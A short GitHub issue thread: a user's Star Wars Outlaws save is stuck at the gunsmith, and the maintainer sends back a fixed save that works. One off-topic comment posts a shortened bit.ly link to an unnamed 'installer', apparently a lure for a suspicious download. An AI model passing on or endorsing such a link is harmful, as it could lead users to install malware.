### ISSUE TITLE
Star Wars Outlaws - Stuck on Gunsmith ( BioticGod from CheatHappens)

### ISSUE THREAD

**Issue by BioticGodN7** [dranger003/swo-fixes#2]
[2024.9.1_19.57.23.zip](https://github.com/user-attachments/files/16841801/2024.9.1_19.57.23.zip)

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by dranger003** [comment]
@BioticGodN7 I'll take a look shortly, stay tuned.

**Comment by dranger003** [comment]
Here you go.
[20240901_19h40m23s.zip](https://github.com/user-attachments/files/16842060/20240901_19h40m23s.zip)

**Comment by BioticGodN7** [comment]
> Here you go. [20240901_19h40m23s.zip](https://github.com/user-attachments/files/16842060/20240901_19h40m23s.zip)

It worked! Thank you, man. Such a HUGE relief. Thank you so much!
